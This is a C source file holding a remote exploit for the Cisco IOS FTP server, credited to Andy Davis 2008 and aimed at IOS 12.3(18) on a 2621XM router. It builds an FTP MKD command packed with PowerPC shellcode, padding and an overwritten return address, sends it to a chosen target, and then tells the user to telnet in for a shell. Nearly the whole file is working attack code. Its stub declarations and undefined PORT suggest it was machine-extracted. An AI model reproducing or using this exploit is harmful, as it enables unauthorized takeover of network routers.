
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_port; TYPE_1__ sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int servaddr ;
typedef int sendbuf ;
typedef int recvbuf ;


 int AF_INET ;
 int PORT ;
 int SOCK_STREAM ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int htons (int ) ;
 int inet_addr (char*) ;
 int printf (char*,...) ;
 int recv (int,unsigned char*,int,int ) ;
 scalar_t__ send (int,unsigned char*,int,int ) ;
 int socket (int ,int ,int ) ;

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "




"\x3c\x80\x81\x83"
"\x38\x84\xda\x60"
"\x7d\x08\x42\x78"
"\x7c\xe4\x40\x2e"
"\x91\x07\x01\x74"
"\x39\x08\xff\xff"
"\x38\xe7\x09\x1a"
"\x91\x07\x04\xca"
"\x7d\x03\x43\x78"
"\x3c\x80\x80\xe4"
"\x38\x84\x08\x6c"
"\x7c\x89\x03\xa6"
"\x4e\x80\x04\x20"



"\x61\x61\x61\x61"
"\x61\x61\x61\x61"
"\x61\x61\x61\x61"
"\x61\x61\x61\x61"
"\x61\x61\x61\x61"
"\x61\x61\x61\x61"

"\x80\x06\x23\xB8"
"\x0d\x0a";
unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

        printf ("\nUsage: %s <target IP address>\n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}
